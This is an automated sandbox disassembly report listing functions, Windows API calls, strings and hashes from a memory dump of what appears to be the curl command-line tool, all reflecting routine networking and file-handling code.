
Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l$free
String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
API String ID: 1144208884-2562657978
Opcode ID: 8fe7eb776271953c1b8705befa5fbaa6a8eab7dc0b8f06851b4383da22a8a0e0
Instruction ID: 971a2295a7f24fa109fb8a3c13fa5fb3e0530763504bb4f208f72d6f10d598dc
Opcode Fuzzy Hash: 8fe7eb776271953c1b8705befa5fbaa6a8eab7dc0b8f06851b4383da22a8a0e0
Instruction Fuzzy Hash: C351C421A0C64641FB21FB11A4506B9E761AF8CB84FD40132DE3D876D9EE3CE54EA3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D19B98 Relevance: 16.4, APIs: 13, Instructions: 165COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C18
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C31
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CA8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CC8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D10
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D39
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D70
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D9E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19DBE

Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D19DE0,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D4155D
Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4159E
Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D415B9
Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D415D4

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19E03
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19E23
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19E95

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 387dcd9767ec118bef3c125f5e000aa80d5e48e86f399106eb2fda1ef2e482db
Instruction ID: 61cce2261e8db540f00f42246246747acb0ba4deec0240b58462b67f09fed3fc
Opcode Fuzzy Hash: 387dcd9767ec118bef3c125f5e000aa80d5e48e86f399106eb2fda1ef2e482db
Instruction Fuzzy Hash: A481DD25709A8596EB08BF31FA502B8E364FF99B44F880135CB6E47791CF3CE4249798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0B44E Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B4C8

Part of subcall function 00007FF7F8D0C0E4: __swprintf_l.LIBCMT ref: 00007FF7F8D0C18B
Part of subcall function 00007FF7F8D0C0E4: fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C19C
Part of subcall function 00007FF7F8D0C0E4: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C1AA
Part of subcall function 00007FF7F8D0C0E4: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C220
Part of subcall function 00007FF7F8D0C0E4: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C23F
Part of subcall function 00007FF7F8D0C0E4: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C294

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B550
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B58B

Part of subcall function 00007FF7F8D077B0: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB

Strings

<none>, xrefs: 00007FF7F8D0B584
%-19s %s, xrefs: 00007FF7F8D0B4F1
%s, xrefs: 00007FF7F8D0B563
Build-time engines:, xrefs: 00007FF7F8D0B549
--disable, xrefs: 00007FF7F8D0B466
Usage: curl [options...] <url>, xrefs: 00007FF7F8D0B4C1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: puts$__acrt_iob_func__swprintf_lfclosefopenfputsfreeisspace
String ID: %s$ <none>$ %-19s %s$--disable$Build-time engines:$Usage: curl [options...] <url>
API String ID: 2654287025-3729519285
Opcode ID: 6eecec63d56d8383e871afb94dbd392f88befcf3364330901c7de097aa842dbf
Instruction ID: 8abf9cdfaf096a17ebdde02f7055e088fd7a689017c7b32906fdbd848bfe4bc6
Opcode Fuzzy Hash: 6eecec63d56d8383e871afb94dbd392f88befcf3364330901c7de097aa842dbf
Instruction Fuzzy Hash: 81414F21A0D64380EF14BB55E4901B9D361EF9C794FD44433D93E8B6E9DE2CE84DA3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07384 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07466

Part of subcall function 00007FF7F8D0FB08: WSAStartup.WS2_32 ref: 00007FF7F8D0FBA5
Part of subcall function 00007FF7F8D0FB08: WSACleanup.WS2_32 ref: 00007FF7F8D0FBCB

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D073D3
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D073BA

Part of subcall function 00007FF7F8D077B0: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07477
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07490

Strings

error initializing curl library, xrefs: 00007FF7F8D0747D
error retrieving curl library information, xrefs: 00007FF7F8D0746C
error initializing curl easy handle, xrefs: 00007FF7F8D073C3
R?, xrefs: 00007FF7F8D074C1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_func$free$CleanupStartupfputs
String ID: error initializing curl easy handle$error initializing curl library$error retrieving curl library information$R?
API String ID: 677633667-495523140
Opcode ID: ee4cfaade065980af47ce4981af93ebbc7ed4b0955015e0771d177f477442d26
Instruction ID: f9a0e32436071bca2ac1ade3069f7c92caba2e6145400617b033a105eb839c9e
Opcode Fuzzy Hash: ee4cfaade065980af47ce4981af93ebbc7ed4b0955015e0771d177f477442d26
Instruction Fuzzy Hash: 58414D21A09A4685F710AB75D4543ACE7A1AF4C758F940235CA3D4A3D9DF3DD408D7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D01BD0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 51filestringCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C0A
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C18
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D01C23
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C4A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D01C55
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D01C5D

Strings

Failed to create the file %s: %s, xrefs: 00007FF7F8D01C63
Refusing to overwrite %s: %s, xrefs: 00007FF7F8D01C29
Remote filename has no length!, xrefs: 00007FF7F8D01C84

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fopenstrerror$_errnofclose
String ID: Failed to create the file %s: %s$Refusing to overwrite %s: %s$Remote filename has no length!
API String ID: 729476436-2765071892
Opcode ID: 3c5bfdb4c7f10f03be92168e0fe2d542fc42eb61b4fd08e665704bce8ff2df22
Instruction ID: c5d356d0ce2f17311910fce9d64aed5e0e3f0db3a6b780f14afe232c83169617
Opcode Fuzzy Hash: 3c5bfdb4c7f10f03be92168e0fe2d542fc42eb61b4fd08e665704bce8ff2df22
Instruction Fuzzy Hash: 03213C61A0EA4695EF14BB64D444378E360EF4CB88F884075CA2D062E9DF6CE44DE3AD

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D18990 Relevance: 15.3, APIs: 10, Instructions: 268networksleepCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32 ref: 00007FF7F8D18A01
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF7F8D18A0E
select.WS2_32 ref: 00007FF7F8D18BE7
WSAGetLastError.WS2_32 ref: 00007FF7F8D18BF2
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D18C95
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D18CAF
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D18CCA
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D18CE1
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D18CFE
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D18D15

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast$Sleepselect
String ID:
API String ID: 2806104629-0
Opcode ID: 3561fc7a812f69438ee48fef225d331526076c44cfc2bde893fe9ced1ef55597
Instruction ID: d41e4b5a014d00deac8a89b1968f337acfcdeb5528f8d37eed71aeeb18cdf26e
Opcode Fuzzy Hash: 3561fc7a812f69438ee48fef225d331526076c44cfc2bde893fe9ced1ef55597
Instruction Fuzzy Hash: E5B14832F09A824BF764EF399840679E291BF487B4F900234E93E46BC4DE3CD9489794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D18D48 Relevance: 12.3, APIs: 8, Instructions: 281networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32 ref: 00007FF7F8D18DC1
WSASetLastError.WS2_32 ref: 00007FF7F8D18F4F
select.WS2_32 ref: 00007FF7F8D18FD7
WSAGetLastError.WS2_32 ref: 00007FF7F8D18FE2
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D1909E
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D190B7
__WSAFDIsSet.WS2_32 ref: 00007FF7F8D190D4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast$select
String ID:
API String ID: 1043644060-0
Opcode ID: 73d85b4132bb218b28ee479f4becfc568b41c399f32ee85f408b58f739fc2532
Instruction ID: ecde4ffaa371a93896d448d6c5b4ea749f4c57c11317de8610f4e53346a36154
Opcode Fuzzy Hash: 73d85b4132bb218b28ee479f4becfc568b41c399f32ee85f408b58f739fc2532
Instruction Fuzzy Hash: 8EB12932B18A4286FB699F38D844279E291FF48768FD04234EA3E476C4DF3DD9489754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D071C0 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF7F8D0723F
WSACleanup.WS2_32 ref: 00007FF7F8D07264
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D07276
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07294
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D072AD
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D072C6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D072D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D072F9

Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C18
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C31
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CA8
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CC8
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CE8
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D10
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D39
Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D70

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$FreeLibraryfclose$Cleanup
String ID:
API String ID: 2673440117-0
Opcode ID: 174b2a87244909aad4b614c749556b912e5266a4113f4507843e47c2b711e0fe
Instruction ID: f3a8f5389497529abbf17749502fbe8e8d992b885498304d312d27cc269ac2cf
Opcode Fuzzy Hash: 174b2a87244909aad4b614c749556b912e5266a4113f4507843e47c2b711e0fe
Instruction Fuzzy Hash: 15413925A0DB469AEB54BF61A540139F3A0FF48B50B880134DA7D07AD4DF3CF468A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D17D68 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 254COMMON

Download Yara Rule

Strings

Connection failed, xrefs: 00007FF7F8D17F4C
Connection time-out, xrefs: 00007FF7F8D17DE8
connect to %s port %ld failed: %s, xrefs: 00007FF7F8D17FA5
Failed to connect to %s port %ld: %s, xrefs: 00007FF7F8D1812D
After %ldms connect time, move on!, xrefs: 00007FF7F8D17E8C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: After %ldms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
API String ID: 0-885759404
Opcode ID: 82d754e653b3492412b34b188de4ad869d8e0f2d8313cdde9b12904d9b0dc2fe
Instruction ID: a7749f7a7056b42b0bfd2174c79b772803b141d22fc5464bddcc6057e2654f46
Opcode Fuzzy Hash: 82d754e653b3492412b34b188de4ad869d8e0f2d8313cdde9b12904d9b0dc2fe
Instruction Fuzzy Hash: BBB1F662B18E8685FB54EB34D4013BDE391AF4CBA4F844231DD2D5B6DADF38A44893A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0DA94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0DADC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0DAED

Strings

%s in column %zu, xrefs: 00007FF7F8D0DB57
curl: (%d) [globbing] %s, xrefs: 00007FF7F8D0DB7A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: callocfree
String ID: %s in column %zu$curl: (%d) [globbing] %s
API String ID: 306872129-219423104
Opcode ID: 4efe587bfeece8c1cc13e8ce50d2900fac93f9f32395f61d8d9a2790e96ce83b
Instruction ID: cf69dc80db7b3f5574106c4bcdf041185eef0fee945110e52985a2ebac6de9d5
Opcode Fuzzy Hash: 4efe587bfeece8c1cc13e8ce50d2900fac93f9f32395f61d8d9a2790e96ce83b
Instruction Fuzzy Hash: 0F31C42260978585FB50AF12A800BB9E3A0FF48BA4F944232DE7D873C8DF3CD4099764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D172B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FF7F8D172FD
WSAIoctl.WS2_32 ref: 00007FF7F8D17387
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D18394), ref: 00007FF7F8D17391

Strings

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00007FF7F8D1739A
Failed to set SO_KEEPALIVE on fd %d, xrefs: 00007FF7F8D1730A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorIoctlLastsetsockopt
String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
API String ID: 1819429192-277924715
Opcode ID: 3587e944e59aea701963ff8685b268f20a61caef4aa2bed2de41810305338489
Instruction ID: ac0f3761e86360aa8c62d9659387e99078b070a16cbfc2cf839060460ec1ca1f
Opcode Fuzzy Hash: 3587e944e59aea701963ff8685b268f20a61caef4aa2bed2de41810305338489
Instruction Fuzzy Hash: 77218F72A0CA8186E7109B64F44136EE7A0EF8DBA4F544135EA6D8AA99CF7CD048CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D139C4 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13A23
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13A43

Part of subcall function 00007FF7F8D23740: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D23768
Part of subcall function 00007FF7F8D23740: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2377B
Part of subcall function 00007FF7F8D23740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D23788
Part of subcall function 00007FF7F8D23740: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D237E4

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13B27

Part of subcall function 00007FF7F8D1C3A4: _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D1C43C

Strings

Connection cache is full, closing the oldest one., xrefs: 00007FF7F8D13BA5
Connection #%ld to host %s left intact, xrefs: 00007FF7F8D13C1E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$CriticalSection$CloseEnterHandleLeave_time64
String ID: Connection #%ld to host %s left intact$Connection cache is full, closing the oldest one.
API String ID: 3574907540-2728177351
Opcode ID: 8459f8bdd80c0128f4a8f39e1386a372b4817de9c99e3599d512dd8fc62300ee
Instruction ID: 4211626bc8ee178cf1e3fc82702fd9647b52ac0c31b327c932be3ebd332e860a
Opcode Fuzzy Hash: 8459f8bdd80c0128f4a8f39e1386a372b4817de9c99e3599d512dd8fc62300ee
Instruction Fuzzy Hash: C271A86170CE8681FB68FB36A41027AE395FF48B94F850035DE6D076D1DE3CE449A398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1A0A0 Relevance: 7.6, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1A0D2
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1A103
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1A121
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1A19A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1A1B3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1A1D0

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc$calloc
String ID:
API String ID: 2045585806-0
Opcode ID: 3c247b900fb9c98e2c52c074d7f9357099afbbf6cc27a6f2014ee928ac9db7de
Instruction ID: 251a908cc72d48d172d1e48bdd643f9bb33f8a57be7a3099ffd67dd52ddaa713
Opcode Fuzzy Hash: 3c247b900fb9c98e2c52c074d7f9357099afbbf6cc27a6f2014ee928ac9db7de
Instruction Fuzzy Hash: 31310C21A09F8692E718AB21F954368E364FF4DB90F880131DB6E477D1DF3CE4689798

